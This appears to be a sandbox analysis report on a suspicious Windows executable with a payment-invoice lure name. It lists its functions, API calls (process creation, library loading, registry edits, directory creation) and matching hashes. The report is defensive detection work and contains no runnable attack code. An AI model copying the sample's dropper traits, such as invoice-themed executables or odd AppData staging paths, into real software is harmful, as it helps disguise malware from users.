Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2727501780
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
API String ID: 1892508949-1810565758
Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F

Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404EEB
CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C

Part of subcall function 00403F60: SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 00403F72

Strings

, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D

Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
CloseHandle.KERNEL32(?), ref: 004054F6

Strings

Error launching installer, xrefs: 004054D3

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D

Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29

Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669

Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
